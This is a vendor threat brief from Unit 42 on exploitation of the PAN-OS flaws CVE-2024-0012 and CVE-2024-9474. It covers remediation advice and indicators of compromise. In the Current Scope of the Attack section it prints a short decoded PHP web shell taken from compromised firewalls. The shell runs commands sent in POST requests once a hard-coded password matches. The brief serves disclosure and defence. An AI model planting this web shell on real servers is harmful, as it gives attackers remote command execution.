Unit 42 Incident Response
Executive Summary
Palo Alto Networks and Unit 42 continue to track exploitation activity related to CVE-2024-0012 and CVE-2024-9474. We are working with external researchers, partners and customers to share information transparently and rapidly.
Fixes for both vulnerabilities are available. Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for additional details about recommended solutions and affected products.
An authentication bypass in Palo Alto Networks PAN-OS software (CVE-2024-0012) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474.
The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines.
Palo Alto Networks has actively monitored and worked with customers to identify and further minimize the very small number of PAN-OS devices with management web interfaces exposed to the internet or other untrusted networks.
Palo Alto Networks originally identified threat activity potentially exploiting CVE-2024-0012 and and CVE-2024-9474 against a limited number of management web interfaces. Palo Alto Networks continues to track additional threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. The Current Scope of the Attack section includes more information about the observed activity. Information about observed indicators and surrounding context is available in the Indicators of Compromise section, while a more complete list of IOCs is available at the Unit42-Timely-Threat-Intel GitHub.
We are tracking the initial exploitation of this vulnerability under the name Operation Lunar Peek.
If you haven’t already, Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended best practice deployment guidelines. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.
Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for up-to-date information about affected products and versions, as well as more remediation guidance.
For assistance related to a potential compromise, please reach out to Palo Alto Networks support. Unit 42 Retainer customers can reach out to Unit 42 directly.
| Vulnerabilities Discussed | CVE-2024-0012, CVE-2024-9474 |
Details of the CVE-2024-0012 and CVE-2024-9474 Vulnerabilities
An authentication bypass in Palo Alto Networks PAN-OS software (CVE-2024-0012) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474.
The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines.
Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for up-to-date information about affected products and versions, as well as more remediation guidance.
Current Scope of the Attack
Palo Alto Networks originally identified threat activity targeting a limited number of device management web interfaces. This original activity, reported on Nov. 18, 2024, primarily originated from IP addresses known to proxy/tunnel traffic for anonymous VPN services.
Unit 42 is actively clustering and characterizing this originally observed threat activity. Originally observed post-exploitation activity included interactive command execution and dropping malware, such as web shells, on the firewall.
Web shell payloads recovered from compromised firewalls were obfuscated. One decoded payload sample (SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668) is presented below:
|
1 2 3 4 5 |
<?php $z="system"; if(${"_POST"}["b"]=="iUqPd") { $z(${"_POST"}["x"]); }; |
The below user-agent string has been observed during multiple actor exploit attempts.
|
1 |
User-Agent:Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko |
Unit 42 recommends monitoring for and investigating any suspicious or otherwise abnormal activity on devices with a management web interface exposed to the internet, as exact post-compromise activity and payloads may vary.
Palo Alto Networks is still actively investigating and remediating all identified threat activity. Palo Alto Networks observed a notable increase in threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. At this time, Unit 42 assesses with high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available, which will enable broader threat activity.
Unit 42 continues to also observe both manual and automated scanning activity aligning with the timeline of third-party artifacts becoming widely available. In agreement with third-party reporting, Unit 42 has also observed increased diversity of post-compromise activity to include additional payloads such as open-source C2 tools as well as crypto miners.
A list of IP addresses and surrounding context are available in Indicators of Compromise, while a more complete list of IOCs is available at the Unit42-Timely-Threat-Intel GitHub.
Unit 42 will continue to update this additional information as relevant data is available and sharable.
Remediation Guidance
Palo Alto Networks recommends that customers update to receive the latest patches that fix CVE-2024-0012 and CVE-2024-9474. Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for up-to-date information about affected products and versions.
If you haven’t already, Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended best practice deployment guidelines. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.
Conclusion
Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.
Palo Alto Networks customers are better protected by our products, as listed below. We will update this threat brief as more relevant information becomes available.
Palo Alto Networks Product Protections for CVE-2024-0012 and CVE-2024-9474
Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.
For assistance related to a potential compromise, please reach out to Palo Alto Networks support. Unit 42 Retainer customers can reach out to the Unit 42 Incident Response team or call:
- North America Toll-Free: 866.486.4842 (866.4.UNIT42)
- EMEA: +31.20.299.3130
- APAC: +65.6983.8730
- Japan: +81.50.1790.0200
Indicators of Compromise
Command and Control Infrastructure
An increasingly high volume of threat actor IP addresses have been identified attempting to scan and/or connect to management web interfaces to exploit CVE-2024-0012 and CVE-2024-9474.
Many of these IP addresses have been known to proxy/tunnel traffic for anonymous VPN services, which may include legitimate user activity originating from these IPs to other destinations.
Unit 42 has also observed both manual and automated scanning originating from various IP addresses. This activity has greatly increased in volume and scope following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024.
A more complete list of observed IP addresses is available at the Unit42-Timely-Threat-Intel GitHub. Unit 42 will continue to update relevant values as additional information is available and sharable.
Post-Exploitation Artifacts
| SHA256 | Context |
| 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668 | PHP web shell payload dropped on a compromised firewall
A decoded view of this payload is available in the Current Scope of the Attack section |
| User-Agent:Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko |
User-agent string observed during multiple actor exploit attempts |
Additional Resources
- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) – Palo Alto Networks Security Advisories
- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface – Palo Alto Networks Security Advisories
- Tips & Tricks: How to Secure the Management Access of Your Palo Alto Networks Device – LIVEcommunity, Palo Alto Networks
Updated Nov. 19, 2024 at 3:00 P.M. PST to add clarifying language to the Executive Summary, expand the Current Scope of the Attack section, and add new IoCs.
Updated Nov. 20, 2024 at 3:25 P.M. PST to make additions to the Executive Summary, the Current Scope of the Attack section, and to add new IoCs.
Updated Nov. 21, 2024 at 3:24 P.M. PST to add user-agent string to Scope of the Attack section and Artifacts subsection in IoCs section. Additional IoCs were added to GitHub and users redirected there. Edited for consistency and clarity.
Updated Nov. 22, 2024 at 3:05 P.M. PST to add additional detail on the diversity of post-compromise activity.
Table of Contents
Related Vulnerabilities Resources
Threat Research
High Profile Threats
Get updates from Unit 42